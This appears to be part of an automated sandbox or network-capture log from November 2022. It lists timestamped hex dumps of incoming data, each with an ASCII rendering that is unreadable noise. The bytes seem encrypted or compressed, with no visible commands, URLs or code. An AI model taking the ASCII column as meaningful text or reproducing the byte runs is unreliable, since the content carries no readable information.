                                                                                                        2022-11-03 22:35:57 UTC281INData Raw: 59 c6 43 44 af a5 56 43 5d 7e 1c ac 8a 46 27 50 02 ad 41 2e c4 c3 05 d8 42 80 ec 94 87 f7 65 c4 79 11 98 9f 07 1c 7f 3b e9 70 93 8d 2e 25 04 9c fc 2c b6 f8 00 60 25 bc 19 19 b5 b5 fe d6 13 e5 0e a4 4c d1 b8 93 03 01 65 dc cd 22 78 0b 3c da 8b 85 97 14 c1 a1 76 c8 b7 70 63 20 30 2e 98 2a ab 90 42 7c b8 18 b2 c5 fd 2f 94 45 56 66 ba b1 02 b0 5b 6f fd 43 06 08 fb 5b d8 9a a2 74 d2 c6 63 25 4a ea 68 86 02 ce f6 a8 09 83 f1 6e ba 67 76 84 4c b0 3d 41 b3 01 03 19 2a 99 98 03 b5 83 75 e5 c5 36 a7 77 65 a5 3b 45 c9 49 3b 4a a4 73 31 d4 92 ca 48 4e 85 de 0c 79 08 cf 3d 4f 03 23 99 23 7e c5 6b 85 21 2a 8e c6 73 9a 5c 25 9f bf 05 d2 9c 88 56 a8 f8 60 13 ae 6d d5 da 93 bd bd 83 0b 2d c7 f9 00 4f e5 5a 8a 4f a2 c3 f0 e5 7d 1e 28 ab 65 c4 38 63 c8 61 da 75 ec 68 76 44
                                                                                                        Data Ascii: YCDVC]~F'PA.Bey;p.%,`%Le"x<vpc 0.*B|/EVf[oC[tc%JhngvL=A*u6we;EI;Js1HNy=O##~k!*s\%V`m-OZO}(e8cauhvD
                                                                                                        2022-11-03 22:35:57 UTC289INData Raw: 49 4e 7b 14 b9 26 72 72 10 4f 35 ff 91 51 73 e8 f7 a8 6d 9a de 4d ee 19 c8 b4 59 80 66 33 e1 0d 77 ec fd 70 44 bd 1e 9d cb 80 a9 d4 28 3c 9d 75 9d a8 5d 37 0d 51 20 96 c8 ee 45 d6 b0 07 93 e0 fe a2 5b bd 40 c8 c1 c1 d3 76 a8 8a 2f 3c ac 39 b6 ee ae b8 61 1d d8 84 2b 0b d3 2e 2d a2 d0 04 0d 37 81 5e 2b 56 f6 a0 c3 84 55 94 a8 d2 c8 53 71 55 b7 ec 35 71 fc 57 70 8d 1f 1d fc 87 49 01 d9 4d 70 13 4c 1d f2 fd 9b 7d 41 ab 8f ba 35 cd 56 c2 87 6d f1 82 2e 8c d7 84 e4 4f aa ec 21 dd 37 7b f6 af fd 85 60 21 e5 83 f6 fd ea 0b 40 43 98 71 08 f2 31 df 64 f2 ad 0e 8e 6f e0 5e cb 25 82 a1 df 35 d7 c6 fc 60 14 f0 d8 db fd 86 b5 12 d7 a4 81 66 21 c2 6a 43 ba 77 1e 23 fc e9 0b d0 d1 49 87 73 05 61 d1 f3 c0 61 6c 9b f3 3b 2b 7b 73 c1 79 d5 65 db 95 c4 fd 93 82 76 68 70 a5
                                                                                                        Data Ascii: IN{&rrO5QsmMYf3wpD(<u]7Q E[@v/<9a+.-7^+VUSqU5qWpIMpL}A5Vm.O!7{`!@Cq1do^%5`f!jCw#Isaal;+{syevhp
                                                                                                        2022-11-03 22:35:57 UTC297INData Raw: 28 ff 6a 6d db 5d 09 ef 3b c1 06 2e a1 50 76 c8 06 08 e3 a9 51 f2 73 ae 94 e7 fb 60 bb 23 24 b3 2b 2c f8 55 cb 81 d3 94 b0 1a 76 bd 92 e0 a5 89 61 50 5d 7a a8 21 9e 7d 80 97 a4 67 2c ec 5a c7 8c 3e 5b 56 a2 4e 8f 1e f4 cb bb e4 48 a8 ec d3 8c d3 d8 e9 43 32 fa 11 6b 41 cd 98 52 68 73 9e 9e 01 cb 07 92 0f 51 b8 e9 97 55 8f eb b2 12 ca e6 96 94 88 49 c0 bd 99 70 91 bf f7 e8 76 3d b7 e7 fb a3 98 bc 8e 5c 93 54 00 2c 4c 32 e9 2b 82 75 7c 32 fd 5f 2c a0 1d fd 49 0f 54 4e 78 4d d8 c5 86 0b 69 e5 47 8e 48 58 37 5e e0 9c 04 46 84 63 be 6c 7a ab 1a 4d 9b f7 15 6c 12 c4 0a 9e e6 0c c5 87 d1 83 38 b8 40 06 f1 5f 5b 1b 7f 69 87 e5 aa 02 bd aa 1a 6e b7 c5 31 99 93 9b 25 c1 c3 a6 c6 a0 14 94 fc 56 08 b4 aa b0 ea 35 dd 8a b9 50 1d 20 66 f7 e9 5f 3f 2d 66 b8 fb 8c a1 45
                                                                                                        Data Ascii: (jm];.PvQs`#$+,UvaP]z!}g,Z>[VNHC2kARhsQUIpv=\T,L2+u|2_,ITNxMiGHX7^FclzMl8@_[in1%V5P f_?-fE
                                                                                                        2022-11-03 22:35:57 UTC305INData Raw: c2 9b 61 92 aa d2 1f 21 ac 4e aa 13 47 ce 81 0c 17 48 15 bf c5 c8 b2 2e 80 10 44 7d 0f a5 1d 59 4a 8f 72 b1 d9 46 fe 86 ba 41 24 6f bc 28 4b 67 01 82 9c fb 24 2d be 57 e2 9a fc f9 58 a8 65 14 33 4c c3 c7 b9 cd 15 1b 49 69 88 7a 82 a0 10 7e b6 b2 99 5a b9 ca c7 e7 7f b2 fa 77 9b 53 78 fc 50 4f d7 54 68 5e 08 c0 3e a2 de 3e d9 24 2d ec 7f dd fd 9c 13 1b 59 00 6e 50 f8 04 40 e1 bc b0 61 a6 88 1b e6 33 d9 b0 d6 f6 c7 4f 94 b4 c9 35 a1 a3 f0 8a a9 5b 90 ee eb 77 81 33 bd 7d 58 c2 85 6e a0 68 f8 4e 88 e4 c3 7c 1e 20 7c 7e 14 cf 4b 5f 80 55 c6 eb 56 09 2e fa 29 0b 83 e5 24 74 71 17 1f 0e 39 bc 99 08 90 59 9f b7 02 d9 39 2c 55 76 88 9a 66 95 bd 06 3d dd c2 b2 c8 16 b3 e7 c5 b7 6e b1 49 c2 e9 6e eb 3d 72 1a a2 67 7d 08 8c 3f f1 3c 52 6b 35 15 bf 84 7f 7b 84 e4 e4
                                                                                                        Data Ascii: a!NGH.D}YJrFA$o(Kg$-WXe3LIiz~ZwSxPOTh^>>$-YnP@a3O5[w3}XnhN| |~K_UV.)$tq9Y9,Uvf=nIn=rg}?<Rk5{
                                                                                                        2022-11-03 22:35:57 UTC313INData Raw: 44 d5 17 5b 37 19 c4 1d f0 b0 83 81 ab 14 44 83 18 ff e5 51 a7 f3 6c 3a 0a 93 39 ed c7 13 91 92 80 84 01 ad 43 76 8b 0a 60 b8 64 fa 40 2d 1e b3 9d 9b 23 a9 97 ef fe 1d b7 de 6a 0f d6 68 8f e6 77 f5 aa c5 e6 d6 8d 75 d1 02 fe 8b 8a 12 3e 59 40 2d ab 69 9b a4 c5 8f c8 c4 8a ab 2b f7 86 32 3e f7 82 a7 33 09 42 99 0a 2c 45 45 d1 1b b8 42 ec 35 3b 06 16 b5 5b 05 f7 e4 5e 9c f6 1e b2 73 ee e2 0a ff 81 f2 05 fb b3 76 82 c9 6a d2 41 1c 17 0b cc 37 1c dc 44 86 17 22 d9 a2 d9 ec c2 08 a6 cf c2 51 05 33 68 d8 f0 78 a2 8b 91 18 09 d0 55 fd 67 24 18 34 37 b6 51 11 44 fc ea 3c c9 13 ba 83 a1 26 e5 e9 bf 08 50 be 82 bf 43 37 9e af 85 b0 4a c8 5f 6e 67 0f 90 93 61 56 47 77 e9 e2 11 e6 17 34 48 22 7f 54 5c 14 15 68 08 dd 99 3d 5d 9a 67 f3 a8 f1 fd 22 00 53 f4 c1 3d 8b 32
                                                                                                        Data Ascii: D[7DQl:9Cv`d@-#jhwu>Y@-i+2>3B,EEB5;[^svjA7D"Q3hxUg$47QD<&PC7J_ngaVGw4H"T\h=]g"S=2
                                                                                                        2022-11-03 22:35:57 UTC320INData Raw: 21 ce 35 2c c8 aa 88 9b 4c 0d 14 11 20 f4 c4 09 19 46 1a 5b a2 38 22 a1 47 da 27 be 84 00 11 4e 93 2c 44 3f 61 8d 75 31 a7 7f 29 36 77 c0 a3 8f 1e cf 37 ef 77 37 2d 4b a3 d8 a4 31 2b 05 73 a1 5e 25 77 6c fa 1e 23 f5 a6 01 03 20 27 63 93 29 a9 65 c1 10 5b e5 a1 ff 11 af 39 a0 7b 81 7c d3 23 35 6f 56 ce 11 e6 29 f4 63 ed 45 d8 d4 7f e5 8b 39 3d ac 1c ae 17 89 60 81 62 fe fb 44 8c 12 c9 14 3f a0 10 2c 6d e3 30 47 bc f2 9a 1a 15 fb 68 e3 bc b0 17 7e 90 ab 60 0a 69 9b 65 cb 8f d9 65 cd 0e d0 da e6 4e 9f 9a 9e 92 df 6b 88 15 07 dd 00 0d 59 d3 47 7f da f6 5c 62 d9 60 69 5f 13 29 2d 3b 0e bd d7 ea 2b e9 a8 2d 08 d8 f0 7c 2a e1 09 0d 8e 79 87 a4 45 5d cc fc c4 32 db 9d 7e 36 89 75 5f 99 6f 2f 0a 55 ac 1c 11 ca 15 ee c2 e8 df 78 db 9f da 2d f6 69 36 d7 8c 82 24 ec
                                                                                                        Data Ascii: !5,L F[8"G'N,D?au1)6w7w7-K1+s^%wl# 'c)e[9{|#5oV)cE9=`bD?,m0Gh~`ieeNkYG\b`i_)-;+-|*yE]2~6u_o/Ux-i6$
                                                                                                        2022-11-03 22:35:57 UTC328INData Raw: 73 f1 51 2f ad 12 08 b1 64 40 02 af bb b3 c9 18 ef 87 3e 4f 4a b4 01 9b 53 e0 c8 a0 99 2d 8a c3 d1 2a 4d 57 6a 5a f0 75 fc a0 84 94 f7 19 17 c3 49 6e 24 13 2f bc 6b 16 a3 0d d8 03 00 94 b9 c7 fa 56 95 2c 9f 29 04 87 da 46 06 3a 8e cd 21 a5 9d 00 ac cd ec ee de 76 46 85 00 be 61 79 75 1c 88 0b 00 ae de 3c 9a 0a 0e d6 af 8b 09 4f d8 e0 ce c7 ff 5d 9b f7 69 88 bc 17 f4 84 e9 b5 73 56 27 77 98 79 7c 5a ec ec 31 b3 c1 0b 42 32 cd cf ff 59 3d 2a 2e bd 0c 90 fa bc 5e 7d 0b 60 8d 83 92 01 be 4e 3a 2f 28 9f 81 64 57 c6 16 86 23 99 eb 4e 51 4a ca 43 2a 95 cb e8 3f d3 e5 b2 c7 67 a9 70 89 a8 6b 7d 9e 34 d1 87 6f ed 75 2c 45 0f 39 1a 12 61 03 4f 4f f1 e9 0f e4 9f 3d d2 d3 fe 06 e6 68 13 6a e5 48 01 e9 f3 82 51 77 42 0e 38 ee 78 e8 bd 55 64 fd 57 c7 ba d2 ea 08 9c 8a
                                                                                                        Data Ascii: sQ/d@>OJS-*MWjZuIn$/kV,)F:!vFayu<O]isV'wy|Z1B2Y=*.^}`N:/(dW#NQJC*?gpk}4ou,E9aOO=hjHQwB8xUdW
                                                                                                        2022-11-03 22:35:57 UTC336INData Raw: 55 8c 52 8c 85 c2 79 82 56 d0 25 a3 f7 ab 5e 5a d5 ab 71 16 10 f6 6a 0d a2 96 d1 1c 88 ba 60 a1 1d 5a b6 a0 01 85 91 c4 2a 5c fc 68 8f c0 85 6f b8 f8 d0 0d 37 2f 7a 3f 62 d9 95 c0 89 c7 92 97 85 73 e9 9d 22 13 06 da bf 0d 00 31 6a 0a ce ac 57 78 76 00 be f7 a2 85 c7 d3 ff 49 84 3d 67 cc 2a 11 40 a8 4e 43 f1 e9 f9 03 32 16 7e 7f 8b 58 82 84 58 b8 8d 25 52 7d 20 ac b4 8f cc a4 d4 25 27 80 c9 40 3c 33 d9 f8 cc 99 06 a4 23 e1 b8 8d 39 ff 89 60 2f 8a 4a d1 4c 20 c5 da aa 66 1a eb 72 b4 b0 30 a6 33 7c 17 f6 47 d3 8a a2 00 f4 68 60 b6 62 52 d4 40 2f 11 99 c7 b4 60 ec cf b4 c9 c4 bd 8c 17 0a f9 9f de ea 84 3a 2b 24 12 ab 6d da 3d b0 0f a2 d9 d9 78 26 1e 58 b2 10 ac 1c 2d 2f 4e a6 5d cd e1 79 3f 3d cb 7a da ec e0 17 43 3c 4e 81 6a c2 ff c2 6b fe 71 37 cf 94 a8 a0
                                                                                                        Data Ascii: URyV%^Zqj`Z*\ho7/z?bs"1jWxvI=g*@NC2~XX%R} %'@<3#9`/JL fr03|Gh`bR@/`:+$m=x&X-/N]y?=zC<Njkq7
                                                                                                        2022-11-03 22:35:57 UTC344INData Raw: 3d 3c f6 f8 89 60 18 8a b4 ae 32 ed bb b5 dd 9c 13 1b 05 38 57 e2 84 d7 98 18 1f 48 44 81 3c ec c2 9b 61 92 aa d2 1f 21 ac 4e aa 13 47 ce 81 0c 17 48 15 bf c5 c8 b2 2e 80 10 44 7d 0f a5 1d 59 1c a8 49 28 14 7a c8 df ef 94 6a fa 1a 07 87 90 4c 73 17 cf e1 91 bc d3 f8 78 61 6a 17 26 1e 3c 35 3b 60 8b 5c 78 19 43 33 4c c3 c7 b9 cd 15 1b 49 69 88 7a 82 a0 10 7e 7a 23 71 51 47 3b 1d 48 78 ec ac 18 a3 f4 cc 0b 5f cd 4e 1c 21 c2 0e 8a 3e a2 de 3e d9 24 2d ec 37 b4 71 ec fe bd 27 e7 6e 50 f8 04 40 e1 bc b0 61 a6 88 1b e6 33 d9 b0 d6 f6 c7 4f 94 b4 c9 35 b6 9d d9 c6 e8 c7 c8 31 eb 77 81 33 bd 7d 58 c2 85 6e a0 68 f8 4e 88 e4 c3 7c 1e 20 7c 7e 14 cf 4b 5f 80 55 c6 eb 56 09 2e fa 29 0b 83 e5 24 74 dc 10 ff c3 c3 01 be 24 fa dc 62 40 03 02 3c 1a 55 76 88 9a 66 95 bd
                                                                                                        Data Ascii: =<`28WHD<a!NGH.D}YI(zjLsxaj&<5;`\xC3LIiz~z#qQG;Hx_N!>>$-7q'nP@a3O51w3}XnhN| |~K_UV.)$t$b@<Uvf
                                                                                                        2022-11-03 22:35:57 UTC352INData Raw: 3b 86 ae 51 22 b1 2f f7 87 56 79 65 77 16 e9 51 0c 2c 2d aa cb 5c b1 85 be 61 8d 70 68 1f 14 da 27 49 4a cf 6e 59 a3 b9 fe c4 64 a8 9b 3e 5f ff 0b 80 5d a3 d9 0b d0 d2 dc 58 f2 f8 9c 0a 2e be 5b dc 2c 3f a8 7f 3c 49 53 69 c0 4e ac e7 11 87 0e 69 72 2a 23 aa 1f 0c 5f 22 56 cb 30 99 c3 3a db 0b a1 5f ad a7 21 d5 f5 29 bc 2b 08 7b a0 f3 04 c0 81 ae 13 83 05 84 6e 44 4d d6 2a ee b6 a7 db 0b a1 5f ad a7 21 d5 e0 d4 e8 d6 47 7d 50 51 af 12 69 2a 8e 40 44 2d fa ed 9f cb 98 a4 01 ea af 12 69 2a 8e 40 44 2d ed ea 8a b4 0f d9 68 65 e9 62 a9 19 57 1c 79 ea f1 d8 9a 5d 16 40 de fa cf 92 f0 35 0f d7 0d 9a f4 78 13 c3 4e 2f fc 24 9d 40 e7 49 f6 73 67 7b f4 f7 13 7e b6 96 25 cf 89 ab df 79 a7 c0 60 c9 73 c7 6d 13 17 fa 04 f9 46 06 8c 31 9d 0e 5f b9 2a 77 c5 d9 04 32 88
                                                                                                        Data Ascii: ;Q"/VyewQ,-\aph'IJnYd>_]X.[,?<ISiNir*#_"V0:_!)+{nDM*_!G}PQi*@D-i*@D-hebWy]@5xN/$@Isg{~%y`smF1_*w2
                                                                                                        2022-11-03 22:35:57 UTC359INData Raw: c9 c6 69 46 2a 09 97 c4 7f 1e 0d 23 7a 52 92 9c 78 29 8a f5 9c ba fe b5 57 1e bc a3 6c ad 34 80 d5 15 ad 73 1f a8 13 db 27 b8 a0 00 3a 38 18 85 e4 61 da 19 86 bb c8 3f dc 43 ef 71 4b 4c 9c 2d 07 15 77 d2 b5 a0 35 19 4d a6 ae c3 2e a6 a0 3a 06 ef 39 3e c0 fc 3f 71 e2 3b 3c 69 a4 85 c9 05 51 22 72 1c c4 cb b9 ec f2 49 95 be 37 d2 ae fc 73 74 26 f1 7b 09 2e c4 48 8b 95 5f 79 39 bf 3e f2 49 95 be 37 d2 ae fc ba 5e e9 e8 8a 61 d1 37 29 95 5a c3 2a ef 37 3f f2 49 95 be 37 d2 ae fc 81 a4 32 da 4a 8e ef 2e 6c a8 2c 70 75 a1 6f 48 f2 49 95 be 37 d2 ae fc a4 65 0e 4e ec a0 eb 23 0b 4e 2d c0 82 a7 ab 21 92 e1 95 03 75 d6 be d9 63 ce ea d0 23 a6 04 d3 fe 2d 51 00 51 1a 07 6d 1f 6e 13 a1 0e 61 84 1b ff c9 b1 7e dc a8 1b 11 0e e1 c6 fd 87 56 5e 1f c8 fb 07 48 b3 2e 8e
                                                                                                        Data Ascii: iF*#zRx)Wl4s':8a?CqKL-w5M.:9>?q;<iQ"rI7st&{.H_y9>I7^a7)Z*7?I72J.l,puoHI7eN#N-!uc#-QQmna~V^H.
                                                                                                        2022-11-03 22:35:57 UTC367INData Raw: 65 01 ad 63 d2 be a1 c4 65 01 ad 63 d2 be a1 c4 65 01 ad 63 d2 be a1 c4 cf 27 33 66 43 f5 ae 56 1c 43 8e 99 1a 87 24 b1 bd b0 0e 70 80 da a5 6e bd b0 0e 70 80 da a5 6e bd b0 0e 70 80 da a5 6e bd b0 0e 70 80 da a5 6e bd b0 0e 70 80 da a5 6e bd b0 0e 70 80 da a5 6e bd b0 0e 70 80 da a5 6e bd b0 0e 70 80 da a5 6e bd b0 0e 70 80 da a5 6e bd b0 0e 70 80 da a5 6e bd b0 0e 70 80 da a5 6e bd b0 0e 70 80 da a5 6e bd b0 0e 70 80 da a5 6e bd b0 0e 70 80 da a5 6e bd b0 0e 70 80 da a5 6e bd b0 0e 70 80 da a5 6e bd b0 0e 70 80 da a5 6e bd b0 0e 70 80 da a5 6e bd b0 0e 70 80 da a5 6e bd b0 0e 70 80 da a5 6e bd b0 0e 70 80 da a5 6e bd b0 0e 70 80 da a5 6e bd b0 0e 70 80 da a5 6e bd b0 0e 70 80 da a5 6e bd b0 0e 70 80 da a5 6e bd b0 0e 70 80 da a5 6e bd b0 0e 70 80 da a5
                                                                                                        Data Ascii: ececec'3fCVC$pnpnpnpnpnpnpnpnpnpnpnpnpnpnpnpnpnpnpnpnpnpnpnpnpnpnp
                                                                                                        2022-11-03 22:35:57 UTC375INData Raw: d6 5f df e4 69 d8 1c 2e 8b 8c e3 dc 71 b3 3a a6 7f 74 8e d2 be a1 5a 2b 99 05 b3 8c 57 77 98 4e d6 5f df e4 69 d8 1c 2e d5 c9 79 37 d8 6a 3c d2 cf ad c8 b7 df 02 47 70 ed a2 2b 1a 41 1c b8 65 88 9b 23 9b 69 6f 76 3f 97 d8 9d fa bb 3d 86 0f 7a b4 5c 82 3a a3 7d 8b 6a ed 61 87 fa 1a c2 f0 30 c0 e9 2d 25 89 66 43 50 54 27 dd f0 a1 25 e0 26 70 b6 1c 84 26 d2 5b 3d 75 3c 4e 11 71 fc 44 30 c0 e9 2d 25 89 66 43 d5 8a 74 fa 94 52 25 76 c1 50 57 23 5a 45 43 a4 37 49 e1 e6 62 2d b7 4f 3d 75 3c 4e 11 71 fc 44 30 c0 e9 2d 25 89 66 43 d5 c9 79 37 d8 6a 3c d2 cf ad c8 b7 df 02 47 70 ed a2 2b 1a 41 1c b8 65 47 9c 4c 68 55 59 47 8a 9d 15 d0 06 eb 05 c2 2b 7a b4 5c 82 3a a3 7d 8b 95 8b 8e 95 b3 84 65 9e 0d d6 da 84 4c c8 b8 2a b8 46 33 20 8b e9 f9 8f 1c 9c b3 e7 84 ad 9d
                                                                                                        Data Ascii: _i.q:tZ+WwN_i.y7j<Gp+Ae#iov?=z\:}ja0-%fCPT'%&p&[=u<NqD0-%fCtR%vPW#ZEC7Ib-O=u<NqD0-%fCy7j<Gp+AeGLhUYG+z\:}eL*F3
                                                                                                        2022-11-03 22:35:57 UTC383INData Raw: 4a 8b fc 1a 5c 10 f4 e7 b4 14 0f 26 86 0f 92 b7 44 02 f4 fd 81 a0 66 04 9c 1b ac 71 c3 eb 59 8d f9 a3 96 13 05 c2 53 6a e9 f7 66 9b 49 ac 3a cd c4 02 36 af 8f ad 02 ad 67 fc de 05 d3 58 ec 79 b2 75 cf 5c 83 5b 41 ce 33 d7 1c 67 c2 89 db c2 8d 1e 47 84 ee 0b fa b9 39 fe 2b aa 67 9c 00 91 f0 97 fd 01 5e 1e 8a f3 7f 6f bd da 82 f9 14 27 86 77 75 5f 9d 12 b6 16 ec 6e d6 fe 6c 07 a8 72 96 68 83 94 76 8e 3f 9e 53 bf cd e4 1c e5 ef c0 a8 a3 e0 59 99 54 db 5b e6 58 4c dd 28 9a 21 c2 6f fc d8 2d e7 88 72 c6 d0 36 c4 23 f1 86 7f 5e 3c b5 48 bb 51 00 f6 90 28 1c 88 36 44 4f ae a6 ea a6 0f a8 65 8c dd 74 7c ce 75 5e ae 90 20 86 f7 62 21 5d 93 e2 6d 4c c9 22 f9 93 98 30 36 80 a2 76 11 25 44 8e 74 e4 96 87 f3 5e 59 f1 cf b9 75 0c 4b cf f4 49 37 54 bf 7d bc b0 6f 03 8e
                                                                                                        Data Ascii: J\&DfqYSjfI:6gXyu\[A3gG9+g^o'wu_nlrhv?SYT[XL(!o-r6#^<HQ(6DOet|u^ b!]mL"06v%Dt^YuKI7T}o
                                                                                                        2022-11-03 22:35:57 UTC391INData Raw: 80 12 56 aa 2d 15 94 ff a7 0d 66 c3 e4 3b be 11 59 5f 48 d4 53 a3 99 ff f2 5a 72 fe 98 c4 6d 19 22 8e 8a b2 ed 1f 05 05 e1 f8 2e 15 93 b2 5b ea 7e fa 15 e9 ea 34 8d 28 7c 2f 34 d4 93 a5 ca 7b 43 0e a4 2a 2e 20 bf 85 00 23 7d b0 23 a2 75 db b8 15 03 7d 80 ce de e4 2d 63 a6 40 59 74 08 ec 1a 81 47 f7 f0 16 2c ed 79 66 b1 11 f6 30 f6 8b 8b 45 c9 85 27 00 29 a6 8a b2 a0 76 29 dd 21 45 a9 67 0c 44 76 c6 76 f7 dd 9d 3c 55 a9 b4 aa 1c 17 cc ea a5 ae ee b7 a9 c0 69 3f ae 8b df 69 67 56 41 0a bd 08 df d5 ba 0b f2 57 94 e1 53 56 f0 e4 7f 9b 77 96 db e6 b1 ac 13 71 dc 7d 3e a9 14 21 a1 53 9a eb 6d 24 0f 5a fd 75 b5 f9 68 91 b3 08 0f 94 3c 14 01 ee 6c c8 a6 29 35 28 e0 e4 34 5b 2c 81 6d 03 48 5f 18 21 86 f7 bf 6f ab 86 62 29 16 ee 2a 8c 49 46 62 69 80 ad 61 53 2e 04
                                                                                                        Data Ascii: V-f;Y_HSZrm".[~4(|/4{C*. #}#u}-c@YtG,yf0E')v)!EgDvv<Ui?igVAWSVwq}>!Sm$Zuh<l)5(4[,mH_!ob)*IFbiaS.
                                                                                                        2022-11-03 22:35:57 UTC398INData Raw: 6f f6 72 3c 55 c8 65 a7 b1 5c 98 27 ed 39 da 1f 6b 51 8d c2 91 76 14 99 f2 e1 f4 f6 c7 10 3a 89 60 97 3e 50 4b c6 e9 9a 8f ed 2b 0a e9 78 ca 3d 9f 60 8b 6a 60 59 3b 91 c1 1a 29 53 95 95 4c 67 ff 16 60 9d f5 c8 be 02 e7 3f 9d bb 30 a6 a6 02 7e b9 1f 3b 7d d4 5c 35 12 f6 a3 14 8f 0b 9e 03 1b 5e ac 39 12 bf 13 7a 89 85 00 a6 13 d4 95 2d 46 f1 9e 22 3e ac 3f bc 5a fa 78 41 e3 8c 3f 7f 97 84 9b e3 f0 11 71 1c 1e d7 2c c4 ef 49 5e 09 02 9c 3e 93 c4 72 35 6e a2 8b bc 2b e5 50 cf a7 26 07 ed d9 6c 86 8d bd 0c 3b b0 49 72 83 21 98 38 c4 bc e7 fb 26 4d 25 c0 3a d3 54 dd fb 78 81 65 ec 85 1f c8 97 17 48 24 fe e1 ef 79 b3 63 1e da db 72 2e a9 8a 4e 56 73 88 05 41 9e 71 2f 12 99 9d 25 ef b1 21 fd c6 6d c2 7e 2b 4a 21 27 85 f3 b6 3e 8d 86 2f 5c b6 84 95 01 76 f9 1e 38
                                                                                                        Data Ascii: or<Ue\'9kQv:`>PK+x=`j`Y;)SLg`?0~;}\5^9z-F">?ZxA?q,I^>r5n+P&l;Ir!8&M%:TxeH$ycr.NVsAq/%!m~+J!'>/\v8
                                                                                                        2022-11-03 22:35:57 UTC406INData Raw: 14 b3 b5 44 ce a0 4f db 1f 13 7b 47 f3 a4 77 5d 89 a7 fa 3b b7 b8 9f f2 ae 5f 78 f5 26 64 ca b1 23 d6 be 36 64 e2 e4 c1 a2 02 9c 76 a9 d3 d4 53 14 80 86 31 65 2c 29 5b fc 91 b3 ae 11 35 e8 34 d8 98 49 f4 9b c6 10 7a 4e d6 39 bf cf 47 bb 3e 13 70 4c 54 d0 c0 24 28 a9 2b 6d 24 43 18 f0 6c ff b2 a3 4a 9c 22 14 a8 02 07 81 26 0c 9c 26 ef e7 19 98 ef 32 19 3b 93 ee ac 49 41 51 2f 53 75 e7 28 9f 11 aa 5c e6 6e 8d 53 54 33 8e d8 4e a9 f9 f7 df 9c 55 85 e3 d6 b6 a7 67 8b 09 24 ec f0 04 04 58 63 ae bf b2 94 23 6e fa 68 61 c3 4b 7b e0 93 c7 60 5f 86 4b 59 15 c2 16 df 46 97 e5 7f 61 8f e9 77 17 41 d1 27 5e 74 fd 1d 8e 8a e0 f5 74 19 05 df e5 86 5a 83 5b c7 7f 67 35 28 a8 96 28 22 ea d2 f5 9e d7 48 a5 d0 79 85 28 1c 06 fb f2 d5 2c f0 d0 2c fb 67 ca 79 22 0b d9 2d 68
                                                                                                        Data Ascii: DO{Gw];_x&d#6dvS1e,)[54IzN9G>pLT$(+m$ClJ"&&2;IAQ/Su(\nST3NUg$Xc#nhaK{`_KYFawA'^ttZ[g5(("Hy(,,gy"-h
                                                                                                        2022-11-03 22:35:57 UTC414INData Raw: 6a b3 81 dc 29 a5 c7 04 7e ee ee 22 e8 36 67 21 76 7d b1 50 2f 17 5b 28 c4 c1 a7 ab 05 19 17 47 cb 22 24 1d 61 90 fb 0a 57 a1 e0 c8 dc 3b 50 d0 41 ef 6c fb 03 4f fe 07 38 83 86 8d 3c 0d a6 f2 94 ef b0 20 e3 5e df 50 bc 06 a6 55 1e de 0d cb 36 d8 71 94 ff b3 fe e1 71 e3 f0 a5 81 4a d8 af 4b 42 9e 49 6e 41 c1 90 07 0a ea 3d a3 cf e9 da 83 6c d8 e5 cc 91 1f 78 5b c9 eb b6 41 50 59 17 bc 0a d4 8c a8 9d 54 82 c9 a6 ce ed e6 7f e3 8a f5 10 58 39 85 35 33 8f f4 e3 a0 12 9e bd 6f 8d 7a b0 2e f1 c6 34 82 50 66 d4 ba 47 ca 7a 51 81 56 a1 32 ad 47 e0 72 0f dd d9 e2 5d 4e 6d 32 20 32 aa 6a 80 89 c2 0f f6 4e 76 a0 6a 4f ba 70 36 e2 6c 34 d5 e7 f3 ba df 37 f0 e5 cb b3 a3 77 dc c4 c1 a7 ab 05 19 17 47 7b d1 aa e9 3d da a1 9d 09 a3 16 3b 01 9d 53 c7 81 cb f2 d6 cf 42 93
                                                                                                        Data Ascii: j)~"6g!v}P/[(G"$aW;PAlO8< ^PU6qqJKBInA=lx[APYTX953oz.4PfGzQV2Gr]Nm2 2jNvjOp6l47wG{=;SB
                                                                                                        2022-11-03 22:35:57 UTC422INData Raw: a4 23 30 54 fb 09 b0 31 94 24 36 a9 7b 2b c6 5e 5e 0e f5 70 c7 fc b6 5d 98 19 43 8c 2e 9b f0 63 ae 51 b6 10 e8 35 94 62 ae e3 54 d3 4f f0 0e eb 39 4a 3b ed 8c 62 c5 c2 f0 66 29 d9 b4 7d 58 01 bd b0 0e 70 80 da a5 6e bd b0 0e 70 80 da a5 6e bd b0 0e 70 80 da a5 6e bd b0 0e 70 80 da a5 6e aa c1 84 f0 39 6a dc 16 6e 37 da e9 b7 9a 88 18 ba 75 3b 07 64 3a 1b 9e 73 54 ee 31 15 81 3a 74 6b 9a e2 54 0e 11 6b 8c 68 b9 8e 92 37 e9 bc 9d f1 e0 2e 64 4a 15 d7 d8 74 36 5a e5 66 b5 d7 dc 74 36 5a e5 66 b5 d7 dc 74 36 5a e5 66 b5 d7 dc 74 36 5a e5 66 b5 d7 dc 74 36 5a e5 66 b5 d7 dc 74 36 5a e5 66 b5 d7 dc 74 36 5a e5 66 b5 d7 dc 74 36 5a e5 66 b5 d7 dc 74 36 5a e5 66 b5 d7 dc 74 36 5a e5 66 b5 d7 dc 74 36 5a e5 66 b5 d7 dc 74 36 5a e5 66 b5 d7 dc 74 36 5a e5 66 b5 d7
                                                                                                        Data Ascii: #0T1$6{+^^p]C.cQ5bTO9J;bf)}Xpnpnpnpn9jn7u;d:sT1:tkTkh7.dJt6Zft6Zft6Zft6Zft6Zft6Zft6Zft6Zft6Zft6Zft6Zft6Zft6Zf
                                                                                                        2022-11-03 22:35:57 UTC430INData Raw: bd b0 0e 70 80 da a5 6e 04 56 65 d3 03 2c b2 23 f0 fa cd ba 23 08 37 e2 bd b0 0e 70 80 da a5 6e 64 36 c6 43 e9 ec 0a 94 bd b0 0e 70 80 da a5 6e b3 22 aa 3e b6 6b 0d e7 b7 dc 08 62 9f 0a 6d 85 47 bd 3e ec b5 2d 9c 79 c1 a9 d5 25 2e f0 30 8e e8 90 9b 43 03 8b 97 1b fd 63 9e e1 c0 c4 48 0b bd b0 0e 70 80 da a5 6e ef 5b 96 eb 35 51 fd 38 0f af ea 62 de cc df b3 6b 48 d2 f8 97 57 fd 1a f6 3c 80 77 7f ad c4 b5 56 ed 64 f6 6c 19 3f 72 b3 85 51 4a e3 ea 8e 68 4b bf 2a 3c f8 ed 2a 25 b9 ad b9 18 a3 5f 95 e6 1c 5b b7 cf a7 5b bc 18 0f af ea 62 de cc df b3 bd b0 0e 70 80 da a5 6e eb ac c0 6b d1 ee cc 45 d6 1e ed ac 52 9d 74 